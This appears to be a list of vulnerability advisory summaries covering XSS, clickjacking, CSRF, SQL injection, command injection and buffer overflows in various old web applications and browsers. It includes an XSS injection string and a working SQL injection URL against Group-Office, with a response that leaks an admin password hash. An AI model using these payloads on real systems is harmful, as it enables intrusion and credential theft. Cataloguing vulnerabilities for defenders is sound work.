Freelancers Marketplace Script is an extensive and powerful script written in PHP and Ajax for launching your own freelancers website. An attacker can insert XSS scripts in the 'title' and the 'describe project' areas. Attack Pattern: '>><marquee><h1>XSS3d By Sid3^effects</h1><marquee>'
Netscape Browser (V9.0.0.6) is vulnerable to clickjacking. An attacker can use this vulnerability to trick users into clicking on malicious links or buttons. This vulnerability can be exploited by an attacker to perform malicious actions on behalf of the user.
This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Safari Browser version 4.0.2.
This vulnerability allows an attacker to trick a user into clicking on a malicious link or button by overlaying it on top of a legitimate link or button. This vulnerability affects Opera Browser version 10.60.
A clickjacking vulnerability exists in Avant Browser (V11.7 build 45) which allows an attacker to trick a user into clicking on a malicious link or button by hiding it beneath a legitimate link or button.
A remote attacker can inject SQL code into the system that hosts the target web application. It is a high-level vulnerability. In json.php, the 'get_comment' method is called with the value of the HTTP request parameter named 'comment_id'. In the 'get_comment' method, the variable '$comment_id' is inserted into the SQL query and executed by the application. Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1) Response: {"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-1970 1:00","mtime":"01-01-1970 1:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS/","user_name":""},"success":true}
ActiTime 2.0 MA is vulnerable to Cross Site Request Forgery (CSRF). The application does not verify the origin of the request when performing certain actions. This allows an attacker to perform certain actions on behalf of a logged-in user, without the user's knowledge. The following actions are vulnerable: Create a new user, Delete a user, Change user password.
A remote attacker can execute commands on the system that hosts the target web application. It is a high-level vulnerability. The attacker needs the gnupg module to be installed. In json.php, the export method is called with the HTTP request parameter named fingerprint. In the export method, the variable $fingerprint is passed to the run_cmd method.
Power/Personal FTP Server is vulnerable to a buffer overflow attack when a malicious user sends a specially crafted RETR command with a PORT specified. This can cause a denial of service condition.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the HTTP POST request. By sending a specially crafted request, an attacker can cause a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running the application.